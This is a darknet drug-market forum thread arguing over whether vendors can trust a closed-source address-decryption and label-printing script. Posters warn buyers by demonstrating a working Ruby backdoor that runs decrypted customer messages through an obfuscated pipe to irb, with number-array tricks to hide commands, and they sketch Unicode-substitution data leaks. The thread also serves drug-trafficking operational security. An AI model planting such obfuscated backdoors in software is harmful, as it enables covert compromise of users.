Most Agorists are very pro-gold and against fiat currency, although bitcoin is of course insanely popular with them as well.
Gold is not money, and as I stated, I value my freedom more than I value money. I believe you misunderstood most of what I said in my last quote. ???
- grahamgreene
-
As such, Louis has the right to market his wares under any conditions that he deems fit.
Nobody really argued that he should be banned from selling it, we are just warning people that it is dumb if they buy it unless the source code is publicly available for all to audit. The type of people who will buy something like this are inherently people who do not know how to properly audit it.
Not true. Pine tried exactly that before starting this thread. See this post from her details earlier in this thread:
http://dkn255hz262ypmii.onion/index.php?topic=40934.msg451841#msg451841
Frankly, what I see here is that Louis appears to be being held to a higher standard than other vendors here on Silk Road.
If a vendor is selling MDMA tablets that are of a press known to frequently contain PMA then is it wrong for us to bring this up? No. He is being held to the same standard as any other vendor, reviews are being left on his product. If someone sells PMA we don't need to try it to leave a review saying that it is dangerous, do we?
Ah, but this isn't really a review of the product, it's your assertions about it with no evidence. You already know how to get the evidence to prove one of us right, you're choosing not to.
Also, your MDMA/PMA analogy still depends on someone purchasing the product and testing it.
As almost everyone who knows me on here is aware, I'm not a drug user. Let's put that aside for a moment, and assume that this is not the case -- let's assume for a moment, for the purpose of argument, that I have decided to purchase a quantity of heroin. Now, how do I know that the heroin I purchase from a vendor on here has not been cut with Drano or rat poison? I don't.
It is wrong to say that his product IS backdoored. It is wrong to say a vendors product has been cut with Drano if you have not purchased some and tested it. it is not wrong to say that PMA is dangerous if a vendor is selling PMA.
Yet you have previously stated that my code contains an exploit simply because you thought of a way it could be done. You have not actually obtained the code and proven that it does contain such an exploit.
I have written the code and stated there is no such exploit. You have yet to prove that I am lying.
Another major vendor is running the code and has stated that it does exactly what I said it did. You and Pine have been unable to prove that false.
So, again, why is Louis being held to a higher standard than everyone else? Why is he being asked to prove the safety of his product, when every other vendor on Silk Road is not?
Because his product could lead to vendors being busted and then customers being busted? But he has no obligation to be responsible with his programs, just as we have no responsibility to say we think his behaviors are anything other than sketchy.
Only if it does what you say it does instead of what I say it does.
Once again, you know how to prove your claim.
I don't trust Louis' software -- I wouldn't rouch it with a barge-pole. I also wouldn't trust software written by Pine, kmfkewm, Shannon or even DPR themselves for that matter, unless I had thoroughly vetted it first.
You should learn C because I am going to release some nice stuff soon :). Also have it in Ruby nearly done but that is just for prototyping.
Guru knows C. Guru's pseudonym is well chosen.
Louis is absolutely right -- he has the right to sell his software, and people have the right to buy it -- or not -- as they see fit.
Sure enough and we have the right to leave reviews saying that we find it sketchy and warning the poor souls who might otherwise think it is safe to privately obtain scripts from people on SR to help aide them in their drug trafficking careers.
Once again, these aren't reviews of the product and your claim that they are is disingenuous at best. Your assertions are a series of hypothetical explanations of how an exploit could be inserted, but not a review of the actual code I am selling.
There has been one review of the code in this thread, which you have chosen to ignore.
That review is here (on the first page):
http://dkn255hz262ypmii.onion/index.php?topic=40934.msg450715#msg450715
-
Well, on a theoretical level I think that everything you said makes sense guru, but on the other hand I feel that your comparison between asking a drug seller to prove their wares and asking a programmer to prove that their software is safe.
The difference is as follows:
1. It's impossible for a drug seller to really prove that they'll always be shipping something safe. It's a lot easier for a programmer to prove that their program is safe by releasing it open source etc.
Two problems here:
1) A programmer could release code that is safe and sell something else.
2) Releasing the code freely cuts out payment for the work put in, as I've explained previously.
2. If a drug dealer ships something unsafe then 1 person has a bad reaction. If louis widely gives out malware specifically targetting vendors and information regarding their vending then thats a major blow to silk road itself.
That's a big if. Pine and Kmf have each asserted it does and I've already stated that anyone can purchase the code and post it to the forum. Until someone does then this is all conjecture and baseless assertions.
3. It's usually possible for a user of drugs to get a reagent test and test their drugs. It's not possible for a prospective user of software to suddenly learn programming and test a program.
It is, however, possible for them to receive an explanation of that code and/or run the code on a disconnected machine.
So sure, don't force louis to do anything, but at the same time I'm glad that people have spoken out against this because this WOULD be a great way to get at vendors(although I don't think that it is that).
For the record, I don't have any problem with questions about what the code does.
What I have a problem with is the baseless and false accusations of nefarious activity on my part with nothing to back it up. You've seen that I've copped that from both Pine and Kmf.
Anyway, to prospective buyers of this software I would ask, is taking the security risk of using unaudited or widely viewed software from an anon on the internet and paying over $100 worth slightly streamlining 1 small part of your job? I certainly wouldn't think so.
It depends on the number of orders, their time constraints and the like. This code when run can go from grabbing orders off the order page to printing labels in well under an hour (a few minutes plus printing time if the addresses are all in the correct format). Some vendors have already stated it takes them much longer to perform this processing task.
-
Indeed, I know a vendor who spends half a day decrypting addresses.
Sroppy does it in milliseconds.
Vendor doesnt have to do crazy gangsigns on his laptop keyboard anymore cutting and pasting blocks of pgp gibberish
Awesome! :)
It's great hearing news like that.
-
I didn't know it took that long, I guess it's a bit more useful than I thought due to that.
Well, this'll be my last post, in the end I don't know enough about programming to really judge to a certainty whether your program could hypothetically be a security risk, however, a lot of the people who DO know about these things better than I do say that it would be including guru saying he woudn't touch it with a barge pole etc. etc.
So what are we arguing about? I don't really know at this point because everyone seems to agree about almost everything, I wish sick girl or someone who thought this was ridiculous or that it couldn't be a security risk would pipe in again.
So if all of those people think a program is unsafe unless certain steps are taken and that is the main concern people have here then what is your really simple summarized response to that? Do you think that it could potentially represent a security risk to buy anonymous unaudited software from you or not? Everyone here seems to think so and that's really the only major point that anyone has brought up but ironically it seems like that is the one point you haven't been clear enough on.
I think you've only really answered by saying you'd somehow give them a completely in depth explanation of absolutely everything regarding the code but unless you made it many many pages and sourced absolutely with internet links etc then they'd just be blindly putting faith in the fact that you're not lying no? It just doesn't seem possible and would probably be MUCH more work than everything else combined. Did you give the vendors who have bought it so far any of that?
I guess you've also said that it would be easier to get to vendors in other ways but that doesn't really say anything whether it's true or not.
-
try this on for size.....
the actual program I would maliciously distribute would be a bit bigger (to actually serve a purpose other than to demonstrate a clever backdoor) but would have this in it ...
Which would be easy to spot by either the presence of the encrypted message or a decryption command other than the one included in the existing code. In order to get it to run with the existing sroppy config it would need to be a .asc file that is distributed initially which is encrypted to the vendor's key (which may be different from the key they are communicating with me with and may not reveal the vendor's username).
So let's be clear: there is NO encrypted data distributed with my code. The only encrypted data used is taken from the vendor's own order page and it is all handled the same way (decrypted, converted to a printable format and then printed).
There is nothing encrypted in my example either, the only encrypted data would be ciphertexts encrypted by anyone to the vendors key. The trick is that if one of the ciphertexts decrypts into a plaintext with a signaling string in it, the entire rest of the message is treated as a totally independent Ruby script. I will change the comments to be more accurate.
#opens the file with your GPG ciphertext in it. Right now you need to have a file that holds them, however the ciphertext can come from anywhere.
file = File.open("test", "r")
#creates a string variable named message
message = ""
#reads the ciphertext file line by line and adds each line to the string variable message, loading the ciphertext into memory
while line = file.gets
message << line
end
#decrypts the message and references the plaintext with the variable decrypted_message
#the ciphertext is decrypted by taking the ciphertext in memory and sending it to the command line
#which then echos it and pipes it to gpg with the -d command. You will be prompted by GPG for
#your passphrase.
decrypted_message = `echo "#{message}" | gpg -d`
#if the decrypted message has the string gpg-privacy-toolkit anywhere in it then the decrypted message is
#piped to the command line where it is echoed and then piped to the ruby interpreter which is called with
#the word irb which is represented as an arracy of numbers to try and obfuscate what is going on. The pipe (|)
# can also be encoded in this way. Once the decrypted message is piped to irb it is treated as a ruby script,
# so if there is networking code in the decrypted message then networking can take place even though there
# is no networking code in this program, the decrypted message is treated as an entirely new script.
if decrypted_message.include?("gpg-privacy-toolkit")
puts `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`
#if the decrypted message doesn't have the signal gpg-privacy-toolkit in it, then merely put the output
#of echoing the decrypted message, which is a bit convoluted since we could just puts the decrypted
#message directly, but it makes the special case seem less sketchy to do it this way.
else
puts `echo "#{decrypted_message"}`
end
#it could be made to look even less sketchy by piping every message to irb and echoing the output of it
#and making it a string to puts if it doesn't contain the special signal string or otherwise treating it as a
#script, then messages will be printed to the terminal unless they have the special signal string
#but there will be no need for an if else statement.
-
You might be able to have it so that you encrypt code that does networking with GPG and have a special header for it,
That would still be easy to spot, just look for encrypted data in the original files.
Still nothing that wouldn't be noticed, but to notice such a thing you would really need to know the language and again if you know the language why are you using a simple script someone else made.
As you say, it is something that would be noticed and also easy to find. Even if you change the "BEGIN PGP MESSAGE" and "END PGP MESSAGE" lines to obfuscate the encrypted block, you'd still have to change them back before decryption. Whatever method you conceive of to conceal them or to rewrite them would be easily found.
Also, searching the code for any GPG command which did not invoke the user's own key and passphrase would be easy to spot. GPG is invoked *once* in this code. By default it is "gpg --decrypt-files *.asc" and that's it (either in a bash script or in an os.system() call). That might be modified to force use of a particular key in order to deal with files encrypted with --hidden-recipient, --hidden-encrypt-to or --throw-keyid. Anything else without a damn good reason and the jig is up.
You are completely misunderstanding what I did. I didn't include encrypted code with the program, I included a line of code in the program that executes a decrypted ciphertext as another script if it has a special signal string in it. The only difference between a completely legitimate version of my simple script (that merely takes a file with a GPG ciphertext in it and prints the plaintext to the screen after the user has entered their password) and a malicious version that allows an attacker to craft a ciphertext that decrypts into additional code that is executed, is this line of code in the original program: | #{[105, 114, 98].pack("c*")
And you can claim all you want here about how your code functions, but nobody will ever know unless they look at it and the full point we are trying to make is that the people who are going to buy it inherently are people who will not notice that | #{[105, 114, 98].pack("c*") is the difference between a safe program and a backdoored version.
-
Except elsewhere you have asserted that it is more than mere potential when you said that 100% of people using my software would be fucked/exploited (see my reply to that statement).
I don't recall saying that, but maybe I did I guess. Maybe you have confused me with Pine???
It uses *very* simple functions, I can explain what things like file.write() and file.readlines() do and then point them at the documentation (which includes examples) to show that I am not lying.
You can explain to people who don't know python that your python script is not backdoored. I could explain to people that | #{[105, 114, 98].pack("c*") sets the formatting of the text, I don't expect them to analyze every single line of what I write simply because they would essentially be learning Ruby to make sure I did not do anything sketchy. Wouldn't it make more sense for me to release the code here, then if anyone who knows Ruby looks at it they might realize what is going on and warn others. And if they know Ruby why are they going to buy something like this??
Then why don't you? Either put your money where your mouth is, buy the code and release it or put your Ruby where your mouth is and code a free alternative.
Hm maybe I will although to be honest right now I am pretty busy working on other things that I will release publicly and not expect people to blindly trust.
Running an executable .py file uses the Python interpreter to run the code. Imported modules are compiled at the time of import by the Python interpreter and run (which generates the .pyc files). Python itself is built in C (which is obviously compiled) with some modules written in C and some in Python.
Ruby is same written in C with much of the modules also C. The primary difference seems to be that python has made it easy to get bytecode for running later without being parsed by the interpreter. That is coming in ruby 2.0 :D.
If the Python interpreter were exploited, that could be a vector of attack. If I'd said "use this code with my custom version of Python" then sure, nail my arse to the wall. I didn't because as long as it's an official release with support for the modules used (currently csv, but likely csv and os when the shell scripts are replaced at some nebulous point in the future) I don't really care. There are enough code savvy eyes looking at the Python code base to make sure someone doesn't sneak something in there.
I am not at all worried that the primary python interpreters are going to be exploited anymore than I am that firefox is. What I am worried about is the fact that someone buying a script like this is not going to recognize | #{[105, 114, 98].pack("c*") is the difference between secure and backdoored. To recognize that you would need to know about both pack and unpack as well as ways of encoding data as well as what the pipe symbol does on the terminal as well as what back ticks do in ruby. The actual program distributed would have no networking code, would make a single call to GPG using the users own key, and could even be made more sneaky by removing the need for an if else statement.
-
Then the issue boils down to where is the encrypted data coming from? If there is encrypted data in my code (there isn't) then what you describe is possible. If the only encrypted data is coming from vendor's order page then it's really not.
Doesn't the encrypted data on the vendors page come from customers? The encrypted data is coming from a customer who encrypts ruby code instead of their address. In fact they can even encrypt ruby code that puts their address after it is done with all of its networking.
To do that I would need to insert code which checked each decrypted address for a specific string and then generate the code.
No it doesn't need to generate the code. Currently what I showed does check for a specific string and if it finds it it pipes the decrypted message to a ruby interpreter, which then runs it as a completely different script automatically. There are probably even more sneaky ways to do it without looking for a special string.
All it does is decrypt the files created from the CSV, decrypt them (as previously described), read the data and then rewrite that in another format to a new file. The reading and writing of files in Python is explained here:
http://docs.python.org/tutorial/inputoutput.html
We can not possibly know what it does without looking at it, that is the entire point of this thread. But honestly if you want to let the market decide I really don't give a shit. I think that you are thinking more with your wallet than logically though.
-
Well, for a start you'd need to translate your Ruby exploit to Python, but ignore that for now.
First I would need to learn Python but I am not going to bother to because I already showed it in Ruby, and the two languages are very similar. Object oriented (usually) interpreted scripting languages.
a) shipping the code with encrypted data that is decrypted and run when the code is executed AND the code is being executed on a system with network access;
Yes it would need to be run on a system with network access, no it does not need to ship the code with encrypted data it gets the malicious code after a vendor decrypts it with their own key.
inserting a function that checks decrypted addresses for such code to run AND is used in conjunction with an order containing that code AND is being run on a system with network access.
It doesn't need to check for code, it can check for anything. It can run messages that are 101 bytes as ruby code and puts all the others. And actually it doesn't even need that because you can directly issue commands to the terminal with Ruby at least and I would highly bet that you can with python. having `ping t.cc` in a script will ping t.cc, just need to encode it in some funky way to try to hide that it is happening. Now there is no need to load networking modules at all or to run any decrypted messages as code.
* No encrypted data is shipped with my code.
But it gets encrypted data input from random customers
* There is a copy of my GPG key currently. I think I will remove it in light of this and just include the details for obtaining it (it's here, on the vendor pages and on the key servers).
There is no reason for there to be a copy of your GPG key, in the example I gave the exploit is encrypted to the vendors key and they load it into the program, they have no ability to tell encrypted ruby code apart from encrypted addresses because ciphertext looks random in either case.
* There is no such exploit in my code.
Possibly not. Probably not even! But nobody really knows unless we can look at it. That is the entire point of this thread. We should not have a culture here where peoples claims are taken at face value, especially when vendors are at risk. The purpose of my posting code was simply to show that even a tiny bit of code can make the difference between a secure program and a backdoored one. Honestly I was surprised at how well the backdoor was hidden, certainly better than in my first attempt where I simply unpacked all the calls to arrays of numbers. I have never tried hiding backdoors in code before, and if I tried harder I could probably even make it more subtle than the last example I gave.
* Such an exploit would be able to be spotted.
Indeed by anyone who know the language well enough to
A. Know what back ticks do
B. Know what pack and unpack do
C. Know what | does on a terminal
D. Know what irb is
E. Knows the language, since they wouldn't just look at that part of the code but would need to audit the entire thing
Such an exploit would be possible to spot if the program went through auditing, someone who doesn't know ruby is not going to look at my code and realize what is going on, they are going to see it doesn't have networking code included with it has no IP addresses or ports listed has no encrypted data included and then assume that they are safe. It would be even less likely to be spotted if I encoded the | as well, or maybe even the entire shell command.
[quote[* My code does not require or use a network connection in any way (vendors an make their own decisions on whether or not to utilise an air gap).[/quote]
Neither does the example code I showed, it gets the networking require from the decrypted ciphertext.
* Vendors do not need to purchase this using their vendor account, they can create a buyer's account, use that to conceal who they are and that they're using my code (as is the case for the vendor who asked me to write it). This would pretty effectively stop an exploit checking address data from being used in a live system.
You would still have intelligence that someone who needs software to manage printing a lot of addresses for them is using a certain IP address.
So, your assertion that "100% of people who buy the script from Louis" will be fucked/exploited is as vile and baseless an assertion as Pine's statement that I am working for law enforcement. It's one thing to to say, "here's how an exploit" could work, but it is another thing entirely to say that because you can think of an exploit then that's what I must be doing and therefore I am whatever you say I am.
I am just saying that we have no fucking clue what you are doing and I demonstrated that not all backdoors are as obvious as one would assume, even in a language like Ruby, which is similar enough to Python that the example works for demonstration purposes.
You, sir, are now engaging in the same type of vile and slanderous accusations as Pine. Your assertion here that my code must contain an exploit because you thought of a way it might be done is as baseless as saying that because paedophiles use anonymous networks then everyone using an anonymous network is a paedophile. It is a fallacious argument and I believe you know this, now you're just flinging mud in the hope that it sticks.
Stop reading into shit. I never said your code must contain an exploit. I countered your claim that your code MUST NOT contain an exploit because it has NO NETWORKING CODE by showing how a single array of three numbers and a call to pack (which has nothing to do with networking) is all it takes for it to have networking code remotely injected into it (with user interaction....but the user interaction that the entire system is designed to handle anyway) via a ciphertext created from a specially crafted plaintext.
-
grepping for ping isn't going to find
[112, 105, 110, 103, 32, 108, 46, 116, 118]
grepping for [112, 105, 110, 103, 32, 108, 46, 116, 118] isn't going to find
[100 + 12, 100 + 5, 100 + 10, 100 + 3, 30 + 2, 100 + 8, 40 + 6, 110 + 6, 110 + 8]
-
There is nothing encrypted in my example either, the only encrypted data would be ciphertexts encrypted by anyone to the vendors key. The trick is that if one of the ciphertexts decrypts into a plaintext with a signaling string in it, the entire rest of the message is treated as a totally independent Ruby script. I will change the comments to be more accurate.
Okay, that does make it clearer. Documentation helps, documentation is a Good Thing. ;)
-
I didn't know it took that long, I guess it's a bit more useful than I thought due to that.
If decrypting an address and pasting it into a template for printing takes 2 or 3 minutes manually, then a larger vendor processing anywhere from a dozen to tens of orders is going to spend a lot of time on a mind-numbing and repetitive task.
So if all of those people think a program is unsafe unless certain steps are taken and that is the main concern people have here then what is your really simple summarized response to that? Do you think that it could potentially represent a security risk to buy anonymous unaudited software from you or not? Everyone here seems to think so and that's really the only major point that anyone has brought up but ironically it seems like that is the one point you haven't been clear enough on.
Well, Kmf is still trying to argue that because it may be possible to plant an exploit in code surreptitiously then obviously my business model/decisions are flawed. He still hasn't managed to find a way to bridge an air gap other than to say that he doesn't think most people employ an air gap.
It doesn't matter how much of a potential exploit might be in software if it is physically prevented from accessing any other network.
I think you've only really answered by saying you'd somehow give them a completely in depth explanation of absolutely everything regarding the code but unless you made it many many pages and sourced absolutely with internet links etc then they'd just be blindly putting faith in the fact that you're not lying no? It just doesn't seem possible and would probably be MUCH more work than everything else combined. Did you give the vendors who have bought it so far any of that?
Only one vendor has it so far, the one who commissioned it. That vendor received step-by-step descriptions of what was being written as it was being written. So effectively, yes.
I guess you've also said that it would be easier to get to vendors in other ways but that doesn't really say anything whether it's true or not.
That was in response to Pine's initial assertion that because I am not giving it away for free I must be some kind of narc. My counter argument was that if I was a narc I would've devised a better mode of attack.
-
You are completely misunderstanding what I did. I didn't include encrypted code with the program, I included a line of code in the program that executes a decrypted ciphertext as another script if it has a special signal string in it. The only difference between a completely legitimate version of my simple script (that merely takes a file with a GPG ciphertext in it and prints the plaintext to the screen after the user has entered their password) and a malicious version that allows an attacker to craft a ciphertext that decrypts into additional code that is executed, is this line of code in the original program: | #{[105, 114, 98].pack("c*")
That really is quite fascinating. One question:
Does the trigger string need to be part of the code or does it just tell the existing code to activate? I'm assuming you mean the former, but I just want to clarify (since I don't know Ruby and don't know what your code snippet actually does).
And you can claim all you want here about how your code functions, but nobody will ever know unless they look at it and the full point we are trying to make is that the people who are going to buy it inherently are people who will not notice that | #{[105, 114, 98].pack("c*") is the difference between a safe program and a backdoored version.
Well, if pack in Ruby is what I think it is, then to do the same in Python I'd have to import struct (and probably array too). I've already said several times what modules are imported, so there goes that.
Hell, there are only two files with integers in them (to read data in each row of the CSVs). Well, alright, 5 files if you count the one with a number in the name and the two files that invoke it. Obviously in the case of those three files the number is part of a string and not an integer.
Plus if a vendor is using an air gap all the networking code in the world won't do shit. Yes, I know buyers are lazy and probably don't, but the paranoia of dealing makes an air gap a greater possibility.
-
Except elsewhere you have asserted that it is more than mere potential when you said that 100% of people using my software would be fucked/exploited (see my reply to that statement).
I don't recall saying that, but maybe I did I guess. Maybe you have confused me with Pine???
Nope, she stopped replying to this thread a couple of days ago.
It uses *very* simple functions, I can explain what things like file.write() and file.readlines() do and then point them at the documentation (which includes examples) to show that I am not lying.
You can explain to people who don't know python that your python script is not backdoored. I could explain to people that | #{[105, 114, 98].pack("c*") sets the formatting of the text, I don't expect them to analyze every single line of what I write simply because they would essentially be learning Ruby to make sure I did not do anything sketchy. Wouldn't it make more sense for me to release the code here, then if anyone who knows Ruby looks at it they might realize what is going on and warn others. And if they know Ruby why are they going to buy something like this??
Hmmm, the flip side to that is that releasing code here isn't quite the same as doing it on the clearnet where there are a greater pool of coders willing to delve into these things. Even if code is posted here on the forums there is no guarantee that any bugs or exploits will be caught by anyone. All it guarantees is working for free.
Now, given that my project is aimed at increasing the efficiency of other people's business, I see nothing wrong with charging for it instead of giving it away. That said, I'm well aware of the advantages of the open source model in code review. I'm just not convinced that there are really enough people here with the skills to do it and as a result posting the code would just mean giving away my work for no real benefit.
By the way, did you actually see the proof-of-concept shell script I posted earlier in this thread? It served as the basis for what became SROPPy.
Then why don't you? Either put your money where your mouth is, buy the code and release it or put your Ruby where your mouth is and code a free alternative.
Hm maybe I will although to be honest right now I am pretty busy working on other things that I will release publicly and not expect people to blindly trust.
How many people here do you expect actually know enough Ruby and/or C to properly audit it and who have the time to do so?
How many people would use it without checking on the assumption that it was posted publicly therefore it must be fine? I'd say that would be more than a few.
Running an executable .py file uses the Python interpreter to run the code. Imported modules are compiled at the time of import by the Python interpreter and run (which generates the .pyc files). Python itself is built in C (which is obviously compiled) with some modules written in C and some in Python.
Ruby is same written in C with much of the modules also C. The primary difference seems to be that python has made it easy to get bytecode for running later without being parsed by the interpreter. That is coming in ruby 2.0 :D.
By the end of next year Ruby will be 18 years old, nearly old enough to drink (in most places) and it still doesn't have that. Wow.
Granted, Python has been around for a few years longer, but it's done the bytecode thing for ages.
I am not at all worried that the primary python interpreters are going to be exploited anymore than I am that firefox is.
There was some concern earlier in the thread about reliance on HTMLDOC (which converts HTML to PDF), mainly from Pine and I think because she'd never heard of it before.
What I am worried about is the fact that someone buying a script like this is not going to recognize | #{[105, 114, 98].pack("c*") is the difference between secure and backdoored. To recognize that you would need to know about both pack and unpack as well as ways of encoding data as well as what the pipe symbol does on the terminal as well as what back ticks do in ruby. The actual program distributed would have no networking code, would make a single call to GPG using the users own key, and could even be made more sneaky by removing the need for an if else statement.
I'll admit I haven't looked too heavily into trying to replicate your backdoor in Python, but from what I've read of the array and struct modules it would not be anywhere near that short. Which would make it more difficult to conceal.
On another note, what would your code do if something triggered the exploit, but an air gap was in place? Would it just keep going and behave as normal or would it die horribly (possibly with an error indicating it could not find a network?
-
Also, I know this is going to come out of left field but could you please stop with the platypus shit at least for this one thread.
Ah! Et tu Brutus? You have wounded me.
Think what you will, but you can always use his software on a machine thats not connected to the net.
Of course. All vendors use physical Air Gaps by burning information from the Internet on read only CD/DVDs, decrypt on the isolated machine, and then in order to communicate back across the Air Gap they use either the keyboard to transfer information across to the networked machine using their eyeballs, or else they utilize something like a checksum to ensure the information coming back on a read only CD/DVD is precisely what was intended to come back across. This will mean manually adding up and knowing the exact data.
Because that's pretty much the only way what you said would work, could work. Otherwise it just doesn't. So what you said is essentially for practical purposes complete bullshit.
Given all the software does, you can do that.
Let us make one thing perfectly clear. Air Gaps are a good idea on their security merits. The best in fact. This does not make them trivial to implement and operate in practice for one second. Nuclear scientists are not known to be especially stupid people, but the Iranian Air Gap for the nuclear facility was still breached. I am not suggesting that you need to be a government to run an Air Gap, but the failure of it to work despite being best practice does illustrate the practical difficulties of using Air Gaps. In practice, a vendor using your software + the Air Gap, would have spent so much of his or her time on the Air Gap with time/money that any advantage to your software would be rendered utterly useless.
I am not explaining that for your benefit Louis because you already know it. I am saying the above for anybody who might take your "simples Air Gap simples" as a legitimate answer.
-
A: What you get today, may not be what you get tomorrow. A bait and switch is as simple as it gets with exploits.
Easily proven wrong with SHA256 checksums. Actually, there's a point, better go and add that for the individual files.
Yes you should. But you didn't do this in the first place, if we believe that you are telling us the truth, then this thought has come to you in hindsight. That's the central troubling factor, that you have talked a great deal about security in the past and yet you made what many of us consider an elementary mistake. When the issue of whether obtaining programs from anonymous people on drug forums is considered sketchy is brought up, your answer is that the vendors can audit the code, which as kmfkewm pointed out later in this thread, is fundamentally illogical because if they can audit the code then they can also write it themselves.
*Pine talking about a way to deliver an exploit.
That's also how Anonymous got the kiddie fiddlers, by getting them to use an infected version of Tor Button.
The question rears its head again of why somebody who clearly knows about the dangers of exploits, would seemingly come up with a plan that bears a startlingly close resemblance to one. It is clear that you must either have malicious intentions, or a rather severe lack of introspection.
C: The vast majority of vendors will not be computer programmers and will have to rely on trust in somebody else's judgement. This is very bad. If you have a flock of apparent experts telling you it's legitimate, you let down your guard and then you get fucked.
The code isn't that complex, I can step them through the essentials of what it does and then they can ask someone not connected to all of this whether I'm full of shit or not.
Red flags everywhere! I think it's already been pointed out, but you're strongly implying that they should trust your judgement. Which given our discussions on relying exclusively on cryptographic trust...
The focus of our concern is that you could be an able enough wordsmith for vendors to think: "yeah, that all sounds pretty legit, no need to get overly paranoid and get other people to test it, I'll just make a quick sweep of the forums and if everybody's happy it should be all good..." (the bandwagon fallacy, it's common to all investors in bubbles as well).
Of course you could (or not, we only have your word for it and your advert contains no caveats of this nature) advise they have somebody else audit the code to check Louis is not bullshitting them, but the real life situation is that
A: Vendors are busy people.
B: Most vendors don't know code (and as evident from this thread, some people think that open source automatically implies a near certain lack of backdoor exploits, which is hilarious were this not so serious when you consider that it is only open source to people who can't read the damn code in the first place, I mean talk about being a one eyed man in the valley of the blind!), and C: this has gone unsaid so far, but it's important, that *they have already paid up for the software and they need to use it rightaway or they wouldn't have purchased it*.
This is practically the archetype of a situation in which somebody would sacrifice security for convenience.
-
D: There are extremely clever ways of putting exploits into code, even when it's capable of being monitored, it can be hard to tell. It's not like reading a book, even experienced programers could be caught out if they are not trained to analyze potentially malicious code. Code analyis for finding memory leaks and other bugs is one thing, hunting down a backdoor is something else completely.
Don't expect an exploit to be straight forward. They are deliberately engineered to obfuscate the origin of the exploit. That is kind of the entire point of an exploit.
Yes there are, but if LE were really trying to do what you say they'd just use a JPG with a malicious exploit in it to fire up whenever the image is loaded.
This is junk. Just like your answer with the Air Gap.
Putting exploits into a JPEG file, or any binary for that matter, is many orders of magnitude more difficult than, just for example... merely giving somebody a program which contains an exploit directly.
This answer you gave, only makes sense to somebody who doesn't know security. That is what has concerned me over and over again, that all your answers sound good on paper to somebody who is less than knowledgeable about computer security e.g. most vendors.
--
Or that you wouldn't simply perform a bait and switch with the software. A single line of code could compromise a vendor's IP address, and it wouldn't have to look obvious like a direct network call either.
It would still require access to a network.
Eventually yes, but it doesn't have to be on a live network or happen immediately. if an exploit was used in the way I described, it would bypass even an Air Gap to decrypt messages and SHA-1 checksum validation on data intended to be outgoing on the networked machine. It isn't really a technological attack, but a psychological one that depends on the vendor not noticing that some characters in his plaintext message have been substituted for other extremely similar characters in order to encode information.
An example:
U+0374 is the unicode for this: ʹ (actually the greek numeral sign) and it looks similar to
U+0341 which is the unicode: ́ (actually a diacritical mark)
Certainly not something you'd notice while composing dozens of messages to people. If you did notice then you'd just assume it was something to do with font rendering or something. But the difference is that the person receiving your messages could be a LE agent who is searching for precisely these encoded differences in order to extract information about the target.
This is not necessarily even the ip address although that is the most straight forward. It could be the handle given to the operating system (which Microsoft will have a record of somewhere), it could really be almost anything, I'm sure others can come up with better ideas of what information to encode.
But there are better examples of using unicode hacking and encoding information to have it passed back by an unwitting target in an encrypted message. In particular if you replace dozens of single 'spaces' with a tab or so for example, making the encoding literally invisible. And of course, all this is happening to plaintext, so any hashing done becomes irrelevant, the computer thinks that is what you intended to send, it doesn't know that you didn't choose those particular characters and they were substitutions from some "helper program".
The "TLDR;" is this. If you think an exploit must rely on a network ping or that a exploit will be visible if you're looking straight at it, then you're wrong. Exploits are nearly always based on a combination of 10% technology and 90% understanding human psychology, ever since the first viruses were invented.
This is not science fiction stuff, it's not especially difficult to do things like this. It is simple to avoid the entire issue by not using unaudited software from anonymous sources, such as your initial proposition Louis.
*pine explains the idea of the character encoding exploit
I think you're misunderstanding what it does with encrypted data. It's simply writing encrypted messages to multiple files and then calling GPG to decrypt them all simultaneously.
[/quote]
You're implying we should take your word for it, that the program does what you say it does. You can "explain" what your program does all day long, but you could be lying. This really is kindergarten stuff.
"It does X" - person 1
"You could be lying for all I know" - person 2
"Let me explain how it all works" - person 1
"..." - person 2
-
To avoid sneaky tricks, the rule is simple and highly efficient. Don't trust software from anonymous sources with extreme prejudice with the exception of the specific situation kmfkewm has mentioned. And even then you have to watch it. The forum could be populated by 1001 people and 1000 of them could be sock puppets. LE have used such software on carding forums and the like with great effect before now.
Then don't buy it. I'm not forcing anyone to, it's their choice.
This is about security, not some kind of "quality control" issue. As many people can buy your software as they like, but they should be informed of how hazardous that proposition could be, hence this thread.
There are far better vector's for attack on this site than a handful of scripts that can be read before their run or run on a disconnected system.
Seriously, if I wanted to do that I'd be planting malicious code in a compressed file that was automatically loaded, like a JPG for example. Put it in an avatar and then make a post attacking a particular vendor to lure that vendor into an argument and force them to load it.
This is nowhere near as simple as you're claiming. Image based exploits exist. But if it was as trivial as you're implying, it would have already been done a long time ago indeed.
Yes, there is, but I'm not forcing anyone to buy or use this. I am providing a product which some vendors may elect to purchase and use and others may choose not to. It's a free market.
This is.. beside the point. Forcing people to do things isn't even a possibility on here. This is a strawman argument, you're pretending my arguments are something other than what they are.
I have already described at least 3 different attacks in this one post alone that you cannot possibly address in your description of what you say is happening because the code is not capable of being properly audited. Any programs from anonymous sources need to be visible on the forum period.
One of which requires network access, which is not required by the program. One involves a false assumption about the use of cryptography in the script (it calls GPG *once* with a decryption command). The last requires planting a backdoor in any of the following: Python (probably already on your system, if it's compromised you're already fucked), Bash (same as Python), GPG (extensively audited already) or HTMLDOC (if you're worried, skip that part).
Once more, you are not even implying it here, you are saying it outright, that we should trust you. This is your original sin.
I seem to remember that your advertisement had *no* caveats about getting somebody else to verify the code against your claims. I seem to remember your advertisement had *no* caveats about using a checksum to make sure you didn't do a bait 'n switch with your program.
*Everything* you said about that only came after this thread. So we have no evidence you had any plans at all to perform any double checking of any kind whatsoever. Whether they would actually work isn't even the question, it's that you apparently thought vendors would merrily download your software without checking it was without exploitation. The vendor that acquired the code from you, if this vendor is actually indeed real and not just a sock puppet, if they did not carefully audit the code, then the vendor is either naive or an idiot.
This is the entire point of this thread. Depending on trust in a single anonymous person's judgement is a recipe for a complete catastrophe for your operational security i.e. Do not pass Go, go to Jail.
And again, for emphasis, it doesn't matter if pine cannot figure out where the exploit is hiding. The fact remains that you've made an incredibly incriminating move on these forums. One that would have been blatantly obvious to any IT security professional, and since you have such expertise, you cannot then go and claim ignorance.
For fuck's sake! I can think of sneakier and nasty ways to target this site, if I was really trying to do it then I sure as shit wouldn't have done tried this. See my JPG example above (and do a Google search on "jpg exploit").
[/quote]
I can't be 100% certain, but reading material on image exploitation, you quickly come to the understanding that doing one would likely have to involve the use of a zero day exploit. Even if it were not at that level of difficulty, it's definitely somewhere in that ballpark. How do I know? Because I'm typing this right now and am not in police custody. If it were easy to do, LE would have already done it to everybody on SR.
